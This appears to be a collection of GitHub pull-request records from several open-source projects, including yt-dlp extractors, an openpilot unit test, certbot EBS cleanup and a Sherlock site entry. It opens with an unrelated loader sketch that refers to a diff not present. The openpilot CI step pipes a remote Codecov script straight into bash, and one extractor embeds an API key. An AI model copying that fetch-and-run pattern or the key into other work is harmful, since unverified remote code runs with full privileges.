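The notebook in this diff states that `extraction_function` defaults to `json.dumps` and that each document carries `namespace`, `api_endpoint` and `collection` metadata. The sketch below shows that mapping on a plain dictionary, without the loader or any network access. The name `to_document_dict` and the placeholder endpoint are hypothetical, and the real `AstraDBLoader` returns LangChain `Document` objects rather than dicts.

```python
import json
from typing import Any, Callable, Dict


def to_document_dict(
    raw: Dict[str, Any],
    namespace: str,
    api_endpoint: str,
    collection: str,
    extraction_function: Callable[[Dict[str, Any]], str] = json.dumps,
) -> Dict[str, Any]:
    """Hypothetical helper: shape one raw record like the loader's output."""
    return {
        # The raw record is serialized into the page content string.
        "page_content": extraction_function(raw),
        "metadata": {
            "namespace": namespace,
            "api_endpoint": api_endpoint,
            "collection": collection,
        },
    }


doc = to_document_dict(
    {"title": "Dangerous Men"},
    namespace="default_keyspace",
    api_endpoint="https://example.invalid",  # placeholder, not a real endpoint
    collection="movie_reviews",
)
print(doc["page_content"])
```

Passing a different `extraction_function`, for example `lambda raw: raw["title"]`, would put only the title in `page_content`.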

Update Twitch url | diff --git a/README.md b/README.md

index c6938bb276..3dbe768e85 100644

--- a/README.md

+++ b/README.md

@@ -464,7 +464,7 @@ API | Description | Auth | HTTPS | Link |

| Telegram Bot | Simplified HTTP version of the MTProto API for bots | `OAuth` | Yes | [Go!](https://core.telegram.org/bots/api) |

| Telegram MTProto | Read and write Telegram data | `OAuth` | Yes | [Go!](https://core.telegram.org/api#getting-started) |

| Tumblr | Read and write Tumblr Data | `OAuth` | Yes | [Go!](https://www.tumblr.com/docs/en/api/v2) |

-| Twitch | Game Streaming API | `OAuth` | Yes | [Go!](https://github.com/justintv/Twitch-API) |

+| Twitch | Game Streaming API | `OAuth` | Yes | [Go!](https://dev.twitch.tv/docs) |

| Twitter | Read and write Twitter data | `OAuth` | Yes | [Go!](https://dev.twitter.com/rest/public) |

| vk | Read and write vk data | `OAuth` | Yes | [Go!](https://vk.com/dev/sites) |

| Thank you for taking the time to work on a Pull Request for this project!

To ensure your PR is dealt with swiftly please check the following:

- [ ] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md).

- [ ] Your changes are made in the [README](../README.md) file, not the auto-generated JSON.

- [ ] Your additions are ordered alphabetically.

- [ ] Your submission has a useful description.

- [ ] Each table column should be padded with one space on either side.

- [ ] You have searched the repository for any relevant issues or PRs.

- [ ] Any category you are creating has the minimum requirement of 3 items.

| https://api.github.com/repos/public-apis/public-apis/pulls/473 | 2017-08-26T23:07:21Z | 2017-08-28T09:14:27Z | 2017-08-28T09:14:27Z | 2017-08-28T09:14:31Z | 274 | public-apis/public-apis | 35,808 |

[extractor/ninegag] Update to 9GAG extractor | diff --git a/yt_dlp/extractor/ninegag.py b/yt_dlp/extractor/ninegag.py

index 00ca95ea2e6..86e710f2b1f 100644

--- a/yt_dlp/extractor/ninegag.py

+++ b/yt_dlp/extractor/ninegag.py

@@ -3,7 +3,7 @@

ExtractorError,

determine_ext,

int_or_none,

- try_get,

+ traverse_obj,

unescapeHTML,

url_or_none,

)

@@ -11,18 +11,20 @@

class NineGagIE(InfoExtractor):

IE_NAME = '9gag'

+ IE_DESC = '9GAG'

_VALID_URL = r'https?://(?:www\.)?9gag\.com/gag/(?P<id>[^/?&#]+)'

_TESTS = [{

'url': 'https://9gag.com/gag/ae5Ag7B',

'info_dict': {

'id': 'ae5Ag7B',

- 'ext': 'mp4',

+ 'ext': 'webm',

'title': 'Capybara Agility Training',

'upload_date': '20191108',

'timestamp': 1573237208,

+ 'thumbnail': 'https://img-9gag-fun.9cache.com/photo/ae5Ag7B_460s.jpg',

'categories': ['Awesome'],

- 'tags': ['Weimaraner', 'American Pit Bull Terrier'],

+ 'tags': ['Awesome'],

'duration': 44,

'like_count': int,

'dislike_count': int,

@@ -32,6 +34,26 @@ class NineGagIE(InfoExtractor):

# HTML escaped title

'url': 'https://9gag.com/gag/av5nvyb',

'only_matching': True,

+ }, {

+ # Non Anonymous Uploader

+ 'url': 'https://9gag.com/gag/ajgp66G',

+ 'info_dict': {

+ 'id': 'ajgp66G',

+ 'ext': 'webm',

+ 'title': 'Master Shifu! Or Splinter! You decide:',

+ 'upload_date': '20220806',

+ 'timestamp': 1659803411,

+ 'thumbnail': 'https://img-9gag-fun.9cache.com/photo/ajgp66G_460s.jpg',

+ 'categories': ['Funny'],

+ 'tags': ['Funny'],

+ 'duration': 26,

+ 'like_count': int,

+ 'dislike_count': int,

+ 'comment_count': int,

+ 'uploader': 'Peter Klaus',

+ 'uploader_id': 'peterklaus12',

+ 'uploader_url': 'https://9gag.com/u/peterklaus12',

+ }

}]

def _real_extract(self, url):

@@ -46,8 +68,6 @@ def _real_extract(self, url):

'The given url does not contain a video',

expected=True)

- title = unescapeHTML(post['title'])

-

duration = None

formats = []

thumbnails = []

@@ -98,7 +118,7 @@ def _real_extract(self, url):

formats.append(common)

self._sort_formats(formats)

- section = try_get(post, lambda x: x['postSection']['name'])

+ section = traverse_obj(post, ('postSection', 'name'))

tags = None

post_tags = post.get('tags')

@@ -110,18 +130,19 @@ def _real_extract(self, url):

continue

tags.append(tag_key)

- get_count = lambda x: int_or_none(post.get(x + 'Count'))

-

return {

'id': post_id,

- 'title': title,

+ 'title': unescapeHTML(post.get('title')),

'timestamp': int_or_none(post.get('creationTs')),

'duration': duration,

+ 'uploader': traverse_obj(post, ('creator', 'fullName')),

+ 'uploader_id': traverse_obj(post, ('creator', 'username')),

+ 'uploader_url': url_or_none(traverse_obj(post, ('creator', 'profileUrl'))),

'formats': formats,

'thumbnails': thumbnails,

- 'like_count': get_count('upVote'),

- 'dislike_count': get_count('downVote'),

- 'comment_count': get_count('comments'),

+ 'like_count': int_or_none(post.get('upVoteCount')),

+ 'dislike_count': int_or_none(post.get('downVoteCount')),

+ 'comment_count': int_or_none(post.get('commentsCount')),

'age_limit': 18 if post.get('nsfw') == 1 else None,

'categories': [section] if section else None,

'tags': tags,

| ### Description of your *pull request* and other information

</details>

<!--

Explanation of your *pull request* in arbitrary form goes here. Please **make sure the description explains the purpose and effect** of your *pull request* and is worded well enough to be understood. Provide as much **context and examples** as possible

-->

Added _9GAG post uploader_ data to NineGagIE

Refactored some of NineGagIE to comply with https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions

Updated existing test and added another to test the uploader data

Fixes #4587
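
The refactor swaps `try_get` lambdas for path-based lookups. As a rough illustration of the idea only (this is not yt-dlp's `traverse_obj`; `get_path` and the sample `post` dict are hypothetical), a nested lookup that returns `None` instead of raising could look like:

```python
def get_path(obj, path, default=None):
    """Follow `path` (a tuple of keys) through nested dicts.

    Returns `default` as soon as a key is missing or a non-dict is hit,
    so callers never need a try/except around the lookup.
    """
    for key in path:
        if not isinstance(obj, dict) or key not in obj:
            return default
        obj = obj[key]
    return obj


# Hypothetical post payload, shaped like the fields the extractor reads.
post = {
    'title': 'Capybara Agility Training',
    'creator': {'fullName': 'Peter Klaus', 'username': 'peterklaus12'},
}

uploader = get_path(post, ('creator', 'fullName'))
section = get_path(post, ('postSection', 'name'))  # key absent: falls back to None
```

Anonymous posts carry no `creator` object, which is why a lookup that tolerates missing keys is convenient here.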

<details open><summary>Template</summary> <!-- OPEN is intentional -->

<!--

# PLEASE FOLLOW THE GUIDE BELOW

- You will be asked some questions, please read them **carefully** and answer honestly

- Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x])

- Use *Preview* tab to see how your *pull request* will actually look like

-->

### Before submitting a *pull request* make sure you have:

- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)

- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests

- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions)

### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:

- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)

- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)

### What is the purpose of your *pull request*?

- [x] Fix or improvement to an extractor (Make sure to add/update tests)

- [ ] New extractor ([Piracy websites will not be accepted](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#is-the-website-primarily-used-for-piracy))

- [ ] Core bug fix/improvement

- [ ] New feature (It is strongly [recommended to open an issue first](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#adding-new-feature-or-making-overarching-changes))

| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/4597 | 2022-08-07T19:05:25Z | 2022-08-07T20:21:53Z | 2022-08-07T20:21:53Z | 2022-08-07T20:21:54Z | 1,085 | yt-dlp/yt-dlp | 7,968 |

common/util.cc: add unit test, fix bug in util::read_file | diff --git a/.github/workflows/selfdrive_tests.yaml b/.github/workflows/selfdrive_tests.yaml

index 305d2c7b889460..c12aedcced6866 100644

--- a/.github/workflows/selfdrive_tests.yaml

+++ b/.github/workflows/selfdrive_tests.yaml

@@ -208,6 +208,7 @@ jobs:

$UNIT_TEST selfdrive/athena && \

$UNIT_TEST selfdrive/thermald && \

$UNIT_TEST tools/lib/tests && \

+ ./selfdrive/common/tests/test_util && \

./selfdrive/camerad/test/ae_gray_test"

- name: Upload coverage to Codecov

run: bash <(curl -s https://codecov.io/bash) -v -F unit_tests

diff --git a/selfdrive/common/SConscript b/selfdrive/common/SConscript

index 8f6c1dc18e9bcb..57c78947996e89 100644

--- a/selfdrive/common/SConscript

+++ b/selfdrive/common/SConscript

@@ -35,3 +35,6 @@ else:

_gpucommon = fxn('gpucommon', files, LIBS=_gpu_libs)

Export('_common', '_gpucommon', '_gpu_libs')

+

+if GetOption('test'):

+ env.Program('tests/test_util', ['tests/test_util.cc'], LIBS=[_common])

diff --git a/selfdrive/common/tests/.gitignore b/selfdrive/common/tests/.gitignore

new file mode 100644

index 00000000000000..2b7a3c6eb89705

--- /dev/null

+++ b/selfdrive/common/tests/.gitignore

@@ -0,0 +1 @@

+test_util

diff --git a/selfdrive/common/tests/test_util.cc b/selfdrive/common/tests/test_util.cc

new file mode 100644

index 00000000000000..fbf190576e0d37

--- /dev/null

+++ b/selfdrive/common/tests/test_util.cc

@@ -0,0 +1,49 @@

+

+#include <dirent.h>

+#include <sys/types.h>

+

+#include <algorithm>

+#include <climits>

+#include <random>

+#include <string>

+

+#define CATCH_CONFIG_MAIN

+#include "catch2/catch.hpp"

+#include "selfdrive/common/util.h"

+

+std::string random_bytes(int size) {

+ std::random_device rd;

+ std::independent_bits_engine<std::default_random_engine, CHAR_BIT, unsigned char> rbe(rd());

+ std::string bytes(size+1, '\0');

+ std::generate(bytes.begin(), bytes.end(), std::ref(rbe));

+ return bytes;

+}

+

+TEST_CASE("util::read_file") {

+ SECTION("read /proc") {

+ std::string ret = util::read_file("/proc/self/cmdline");

+ REQUIRE(ret.find("test_util") != std::string::npos);

+ }

+ SECTION("read file") {

+ char filename[] = "/tmp/test_read_XXXXXX";

+ int fd = mkstemp(filename);

+

+ REQUIRE(util::read_file(filename).empty());

+

+ std::string content = random_bytes(64 * 1024);

+ write(fd, content.c_str(), content.size());

+ std::string ret = util::read_file(filename);

+ REQUIRE(ret == content);

+ close(fd);

+ }

+ SECTION("read directory") {

+ REQUIRE(util::read_file(".").empty());

+ }

+ SECTION("read non-existent file") {

+ std::string ret = util::read_file("does_not_exist");

+ REQUIRE(ret.empty());

+ }

+ SECTION("read non-permission") {

+ REQUIRE(util::read_file("/proc/kmsg").empty());

+ }

+}

diff --git a/selfdrive/common/util.cc b/selfdrive/common/util.cc

index fd2e46db1358e4..bcdc7997dd4008 100644

--- a/selfdrive/common/util.cc

+++ b/selfdrive/common/util.cc

@@ -56,8 +56,8 @@ namespace util {

std::string read_file(const std::string& fn) {

std::ifstream ifs(fn, std::ios::binary | std::ios::ate);

if (ifs) {

- std::ifstream::pos_type pos = ifs.tellg();

- if (pos != std::ios::beg) {

+ int pos = ifs.tellg();

+ if (pos > 0) {

std::string result;

result.resize(pos);

ifs.seekg(0, std::ios::beg);

| <!-- Please copy and paste the relevant template -->

<!--- ***** Template: Car bug fix *****

**Description** [](A description of the bug and the fix. Also link any relevant issues.)

**Verification** [](Explain how you tested this bug fix.)

**Route**

Route: [a route with the bug fix]

-->

<!--- ***** Template: Bug fix *****

**Description** [](A description of the bug and the fix. Also link any relevant issues.)

**Verification** [](Explain how you tested this bug fix.)

-->

<!--- ***** Template: Car port *****

**Checklist**

- [ ] added to README

- [ ] test route added to [test_routes.py](https://github.com/commaai/openpilot/blob/master/selfdrive/test/test_models.py)

- [ ] route with openpilot:

- [ ] route with stock system:

-->

<!--- ***** Template: Refactor *****

**Description** [](A description of the refactor, including the goals it accomplishes.)

**Verification** [](Explain how you tested the refactor for regressions.)

-->

| https://api.github.com/repos/commaai/openpilot/pulls/21251 | 2021-06-13T17:47:28Z | 2021-06-16T09:01:13Z | 2021-06-16T09:01:13Z | 2021-06-16T09:02:31Z | 1,007 | commaai/openpilot | 9,847 |

Add areena.yle.fi video download support | diff --git a/yt_dlp/extractor/_extractors.py b/yt_dlp/extractor/_extractors.py

index 8652ec54e55..12218a55c48 100644

--- a/yt_dlp/extractor/_extractors.py

+++ b/yt_dlp/extractor/_extractors.py

@@ -2233,6 +2233,7 @@

from .yapfiles import YapFilesIE

from .yesjapan import YesJapanIE

from .yinyuetai import YinYueTaiIE

+from .yle_areena import YleAreenaIE

from .ynet import YnetIE

from .youjizz import YouJizzIE

from .youku import (

diff --git a/yt_dlp/extractor/yle_areena.py b/yt_dlp/extractor/yle_areena.py

new file mode 100644

index 00000000000..118dc1262d1

--- /dev/null

+++ b/yt_dlp/extractor/yle_areena.py

@@ -0,0 +1,71 @@

+from .common import InfoExtractor

+from .kaltura import KalturaIE

+from ..utils import int_or_none, traverse_obj, url_or_none

+

+

+class YleAreenaIE(InfoExtractor):

+ _VALID_URL = r'https?://areena\.yle\.fi/(?P<id>[\d-]+)'

+ _TESTS = [{

+ 'url': 'https://areena.yle.fi/1-4371942',

+ 'md5': '932edda0ecf5dfd6423804182d32f8ac',

+ 'info_dict': {

+ 'id': '0_a3tjk92c',

+ 'ext': 'mp4',

+ 'title': 'Pouchit',

+ 'description': 'md5:d487309c3abbe5650265bbd1742d2f82',

+ 'series': 'Modernit miehet',

+ 'season': 'Season 1',

+ 'season_number': 1,

+ 'episode': 'Episode 2',

+ 'episode_number': 2,

+ 'thumbnail': 'http://cfvod.kaltura.com/p/1955031/sp/195503100/thumbnail/entry_id/0_a3tjk92c/version/100061',

+ 'uploader_id': 'ovp@yle.fi',

+ 'duration': 1435,

+ 'view_count': int,

+ 'upload_date': '20181204',

+ 'timestamp': 1543916210,

+ 'subtitles': {'fin': [{'url': r're:^https?://', 'ext': 'srt'}]},

+ 'age_limit': 7,

+ }

+ }]

+

+ def _real_extract(self, url):

+ video_id = self._match_id(url)

+ info = self._search_json_ld(self._download_webpage(url, video_id), video_id, default={})

+ video_data = self._download_json(

+ f'https://player.api.yle.fi/v1/preview/{video_id}.json?app_id=player_static_prod&app_key=8930d72170e48303cf5f3867780d549b',

+ video_id)

+

+ # Example title: 'K1, J2: Pouchit | Modernit miehet'

+ series, season_number, episode_number, episode = self._search_regex(

+ r'K(?P<season_no>[\d]+),\s*J(?P<episode_no>[\d]+):?\s*\b(?P<episode>[^|]+)\s*\|\s*(?P<series>.+)',

+ info.get('title') or '', 'episode metadata', group=('season_no', 'episode_no', 'episode', 'series'),

+ default=(None, None, None, None))

+ description = traverse_obj(video_data, ('data', 'ongoing_ondemand', 'description', 'fin'), expected_type=str)

+

+ subtitles = {}

+ for sub in traverse_obj(video_data, ('data', 'ongoing_ondemand', 'subtitles', ...)):

+ if url_or_none(sub.get('uri')):

+ subtitles.setdefault(sub.get('language') or 'und', []).append({

+ 'url': sub['uri'],

+ 'ext': 'srt',

+ 'name': sub.get('kind'),

+ })

+

+ return {

+ '_type': 'url_transparent',

+ 'url': 'kaltura:1955031:%s' % traverse_obj(video_data, ('data', 'ongoing_ondemand', 'kaltura', 'id')),

+ 'ie_key': KalturaIE.ie_key(),

+ 'title': (traverse_obj(video_data, ('data', 'ongoing_ondemand', 'title', 'fin'), expected_type=str)

+ or episode or info.get('title')),

+ 'description': description,

+ 'series': (traverse_obj(video_data, ('data', 'ongoing_ondemand', 'series', 'title', 'fin'), expected_type=str)

+ or series),

+ 'season_number': (int_or_none(self._search_regex(r'Kausi (\d+)', description, 'season number', default=None))

+ or int(season_number)),

+ 'episode_number': (traverse_obj(video_data, ('data', 'ongoing_ondemand', 'episode_number'), expected_type=int_or_none)

+ or int(episode_number)),

+ 'thumbnails': traverse_obj(info, ('thumbnails', ..., {'url': 'url'})),

+ 'age_limit': traverse_obj(video_data, ('data', 'ongoing_ondemand', 'content_rating', 'age_restriction'), expected_type=int_or_none),

+ 'subtitles': subtitles,

+ }

| **IMPORTANT**: PRs without the template will be CLOSED

### Description of your *pull request* and other information

</details>

<!--

Explanation of your *pull request* in arbitrary form goes here. Please **make sure the description explains the purpose and effect** of your *pull request* and is worded well enough to be understood. Provide as much **context and examples** as possible

-->

Added new extractor for single videos from areena.yle.fi and corresponding test.

Fixes #2508
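
For reference, the title format the extractor falls back on is `'K1, J2: Pouchit | Modernit miehet'` (season, episode, episode title, series). A minimal standalone sketch of that parsing step, assuming the separator between episode and series is a literal `|`; `parse_title` is a hypothetical helper, not part of the extractor:

```python
import re

# Season (K), episode (J), episode title, then a literal "|" and the series name.
TITLE_RE = re.compile(
    r'K(?P<season_no>\d+),\s*J(?P<episode_no>\d+):?\s*\b'
    r'(?P<episode>[^|]+)\s*\|\s*(?P<series>.+)')


def parse_title(title):
    """Return the parsed metadata as a dict, or None if the title does not match."""
    match = TITLE_RE.search(title or '')
    if not match:
        return None
    return {
        'season_number': int(match.group('season_no')),
        'episode_number': int(match.group('episode_no')),
        # [^|]+ is greedy and keeps the space before "|", so strip it.
        'episode': match.group('episode').strip(),
        'series': match.group('series').strip(),
    }
```

Returning `None` on a non-matching title lets the caller decide on a fallback instead of converting a missing group with `int()`.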

<details open><summary>Template</summary> <!-- OPEN is intentional -->

<!--

# PLEASE FOLLOW THE GUIDE BELOW

- You will be asked some questions, please read them **carefully** and answer honestly

- Put an `x` into all the boxes `[ ]` relevant to your *pull request* (like [x])

- Use *Preview* tab to see how your *pull request* will actually look like

-->

### Before submitting a *pull request* make sure you have:

- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)

- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests

- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8) and [ran relevant tests](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions)

### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:

- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)

- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)

### What is the purpose of your *pull request*?

- [ ] Fix or improvement to an extractor (Make sure to add/update tests)

- [x] New extractor ([Piracy websites will not be accepted](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#is-the-website-primarily-used-for-piracy))

- [ ] Core bug fix/improvement

- [ ] New feature (It is strongly [recommended to open an issue first](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#adding-new-feature-or-making-overarching-changes))

| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/5270 | 2022-10-17T18:10:02Z | 2022-11-11T09:36:24Z | 2022-11-11T09:36:24Z | 2022-11-11T09:37:37Z | 1,284 | yt-dlp/yt-dlp | 7,805 |

Skip langchain `test_agent_run` failing test | diff --git a/lib/test-requirements.txt b/lib/test-requirements.txt

index f6c0442d355d..d52b76a4dcb8 100644

--- a/lib/test-requirements.txt

+++ b/lib/test-requirements.txt

@@ -46,3 +46,6 @@ sqlalchemy[mypy]>=1.4.25, <2.0

# Pydantic 1.* fails to initialize validators, we add it to requirements

# to test the fix. Pydantic 2 should not have that issue.

pydantic>=1.0, <2.0

+

+# semver 3 renames VersionInfo so temporarily pin until we deal with it

+semver<3

diff --git a/lib/tests/streamlit/external/langchain/streamlit_callback_handler_test.py b/lib/tests/streamlit/external/langchain/streamlit_callback_handler_test.py

index e82049ba2d57..8d9ab3d6a87f 100644

--- a/lib/tests/streamlit/external/langchain/streamlit_callback_handler_test.py

+++ b/lib/tests/streamlit/external/langchain/streamlit_callback_handler_test.py

@@ -17,6 +17,9 @@

import unittest

from pathlib import Path

+import langchain

+import pytest

+import semver

from google.protobuf.json_format import MessageToDict

import streamlit as st

@@ -74,6 +77,10 @@ def test_import_from_langchain(self):

class StreamlitCallbackHandlerTest(DeltaGeneratorTestCase):

+ @pytest.mark.skipif(

+ semver.VersionInfo.parse(langchain.__version__) >= "0.0.296",

+ reason="Skip version verification when `SKIP_VERSION_CHECK` env var is set",

+ )

def test_agent_run(self):

"""Test a complete LangChain Agent run using StreamlitCallbackHandler."""

from streamlit.external.langchain import StreamlitCallbackHandler

| Skip the langchain `test_agent_run` test if the installed langchain version is newer than 0.0.295 (after https://github.com/langchain-ai/langchain/pull/10797/, the old pickle file we use can no longer be loaded into an instance of the new `AgentAction` class).
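
The skip condition boils down to a version comparison. A minimal sketch of that check, using plain integer tuples as a stand-in for `semver` (an assumption for illustration; `parse_version` and `should_skip` are hypothetical names, and pre-release suffixes are not handled):

```python
def parse_version(version):
    """Turn '0.0.296' into (0, 0, 296); assumes plain dotted integers."""
    return tuple(int(part) for part in version.split('.'))


def should_skip(installed, first_broken='0.0.296'):
    """True when the installed version is at or past the first incompatible release."""
    return parse_version(installed) >= parse_version(first_broken)
```

Comparing tuples of integers avoids the string-ordering trap where `'0.0.1000' < '0.0.296'`.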

<!--

⚠️ BEFORE CONTRIBUTING PLEASE READ OUR CONTRIBUTING GUIDELINES!

https://github.com/streamlit/streamlit/wiki/Contributing

-->

## Describe your changes

## GitHub Issue Link (if applicable)

## Testing Plan

- Explanation of why no additional tests are needed

- Unit Tests (JS and/or Python)

- E2E Tests

- Any manual testing needed?

---

**Contribution License Agreement**

By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.

| https://api.github.com/repos/streamlit/streamlit/pulls/7399 | 2023-09-21T15:41:56Z | 2023-09-21T18:14:18Z | 2023-09-21T18:14:18Z | 2023-09-21T18:15:03Z | 407 | streamlit/streamlit | 22,129 |

Automate EBS cleanup | diff --git a/tests/letstest/multitester.py b/tests/letstest/multitester.py

index 17740cde820..0ae9636d428 100644

--- a/tests/letstest/multitester.py

+++ b/tests/letstest/multitester.py

@@ -128,6 +128,7 @@ def make_instance(instance_name,

userdata=""): #userdata contains bash or cloud-init script

new_instance = EC2.create_instances(

+ BlockDeviceMappings=_get_block_device_mappings(ami_id),

ImageId=ami_id,

SecurityGroups=security_groups,

KeyName=keyname,

@@ -151,38 +152,21 @@ def make_instance(instance_name,

raise

return new_instance

-def terminate_and_clean(instances):

- """

- Some AMIs specify EBS stores that won't delete on instance termination.

- These must be manually deleted after shutdown.

+def _get_block_device_mappings(ami_id):

+ """Returns the list of block device mappings to ensure cleanup.

+

+ This list sets connected EBS volumes to be deleted when the EC2

+ instance is terminated.

+

"""

- volumes_to_delete = []

- for instance in instances:

- for bdmap in instance.block_device_mappings:

- if 'Ebs' in bdmap.keys():

- if not bdmap['Ebs']['DeleteOnTermination']:

- volumes_to_delete.append(bdmap['Ebs']['VolumeId'])

-

- for instance in instances:

- instance.terminate()

-

- # can't delete volumes until all attaching instances are terminated

- _ids = [instance.id for instance in instances]

- all_terminated = False

- while not all_terminated:

- all_terminated = True

- for _id in _ids:

- # necessary to reinit object for boto3 to get true state

- inst = EC2.Instance(id=_id)

- if inst.state['Name'] != 'terminated':

- all_terminated = False

- time.sleep(5)

-

- for vol_id in volumes_to_delete:

- volume = EC2.Volume(id=vol_id)

- volume.delete()

-

- return volumes_to_delete

+ # Not all devices use EBS, but the default value for DeleteOnTermination

+ # when the device does use EBS is true. See:

+ # * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html

+ # * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html

+ return [{'DeviceName': mapping['DeviceName'],

+ 'Ebs': {'DeleteOnTermination': True}}

+ for mapping in EC2.Image(ami_id).block_device_mappings

+ if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]

# Helper Routines

@@ -370,10 +354,11 @@ def test_client_process(inqueue, outqueue):

def cleanup(cl_args, instances, targetlist):

print('Logs in ', LOGDIR)

if not cl_args.saveinstances:

- print('Terminating EC2 Instances and Cleaning Dangling EBS Volumes')

+ print('Terminating EC2 Instances')

if cl_args.killboulder:

boulder_server.terminate()

- terminate_and_clean(instances)

+ for instance in instances:

+ instance.terminate()

else:

# print login information for the boxes for debugging

for ii, target in enumerate(targetlist):

| Part of #6056.

I have another piece to this locally which makes terminating the instances more reliable, but I thought I'd split up the PR and first submit this, which causes Amazon to automatically delete EBS volumes when instances are shut down.

The general approach here is described at https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/RootDeviceStorage.html#Using_RootDeviceStorage. Doing something like this significantly speeds up cleanup and ensures we always clean up storage because [EC2 only supports EBS and instance volumes](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/block-device-mapping-concepts.html#block-device-mapping-def) and [instance volumes cannot outlive the associated instance](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#instance-store-lifetime).
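
To make the filtering step concrete without touching AWS, here is a small sketch that applies the same selection logic as `_get_block_device_mappings` to a plain list of mapping dicts. The function name and the sample mappings are hypothetical; in the real code the list comes from the AMI's block device mappings.

```python
def delete_on_termination_overrides(image_mappings):
    """Build overrides for EBS devices that would otherwise survive termination.

    Mappings without an 'Ebs' key (instance-store devices) and EBS mappings
    that already delete on termination are left out.
    """
    return [
        {'DeviceName': mapping['DeviceName'],
         'Ebs': {'DeleteOnTermination': True}}
        for mapping in image_mappings
        if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)
    ]


# Hypothetical AMI mappings: one EBS root volume that would be kept,
# one instance-store device, and one EBS volume already set to be deleted.
sample_mappings = [
    {'DeviceName': '/dev/sda1', 'Ebs': {'DeleteOnTermination': False, 'VolumeSize': 8}},
    {'DeviceName': '/dev/sdb', 'VirtualName': 'ephemeral0'},
    {'DeviceName': '/dev/sdc', 'Ebs': {'DeleteOnTermination': True}},
]

overrides = delete_on_termination_overrides(sample_mappings)
```

Only `/dev/sda1` needs an override in this sample, so the list passed as `BlockDeviceMappings` stays as small as possible.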

Probably the easiest way to test this is to run a test with `--killboulder` on the command line and wait for the test to finish or hit ctrl+c after you see "Waiting on Boulder Server". If you do that and wait a few minutes, you can then run `aws ec2 --profile <profile> describe-volumes` and if no one else is running tests on our account, the output should be empty. | https://api.github.com/repos/certbot/certbot/pulls/6160 | 2018-06-28T21:31:47Z | 2018-07-18T00:19:05Z | 2018-07-18T00:19:05Z | 2018-08-22T18:31:43Z | 779 | certbot/certbot | 260 |

fix(relay): Make MEP metrics extraction work through flagr | diff --git a/src/sentry/features/__init__.py b/src/sentry/features/__init__.py

index 973abc31c08f85..dc2c71fdc17e07 100644

--- a/src/sentry/features/__init__.py

+++ b/src/sentry/features/__init__.py

@@ -133,7 +133,7 @@

default_manager.add("organizations:slack-overage-notifications", OrganizationFeature, True)

default_manager.add("organizations:symbol-sources", OrganizationFeature)

default_manager.add("organizations:team-roles", OrganizationFeature, True)

-default_manager.add("organizations:transaction-metrics-extraction", OrganizationFeature)

+default_manager.add("organizations:transaction-metrics-extraction", OrganizationFeature, True)

default_manager.add("organizations:unified-span-view", OrganizationFeature, True)

default_manager.add("organizations:widget-library", OrganizationFeature, True)

default_manager.add("organizations:widget-viewer-modal", OrganizationFeature, True)

| While transaction metrics are not stabilized, let's enable them through flagr for a moment. This partially reverts https://github.com/getsentry/sentry/commit/755a304d7d5ebd1c9ea5a61e407d38924f4fcb65 / #31995 | https://api.github.com/repos/getsentry/sentry/pulls/35922 | 2022-06-22T19:20:04Z | 2022-06-22T19:44:31Z | 2022-06-22T19:44:31Z | 2022-07-08T00:03:20Z | 201 | getsentry/sentry | 44,465 |

Add Yandex Music | diff --git a/sherlock/resources/data.json b/sherlock/resources/data.json

index 1e6f1641e..8fcb909c6 100644

--- a/sherlock/resources/data.json

+++ b/sherlock/resources/data.json

@@ -2231,6 +2231,13 @@

"username_claimed": "blue",

"username_unclaimed": "noonewouldeverusethis7"

},

+ "YandexMusic": {

+ "errorType": "status_code",

+ "url": "https://music.yandex/users/{}/playlists",

+ "urlMain": "https://music.yandex",

+ "username_claimed": "ya.playlist",

+ "username_unclaimed": "noonewouldeverusethis"

+ },

"YouNow": {

"errorMsg": "No users found",

"errorType": "message",

| Add https://music.yandex/ | https://api.github.com/repos/sherlock-project/sherlock/pulls/1525 | 2022-10-06T10:24:52Z | 2022-10-09T12:22:13Z | 2022-10-09T12:22:13Z | 2022-10-09T12:22:13Z | 198 | sherlock-project/sherlock | 36,328 |

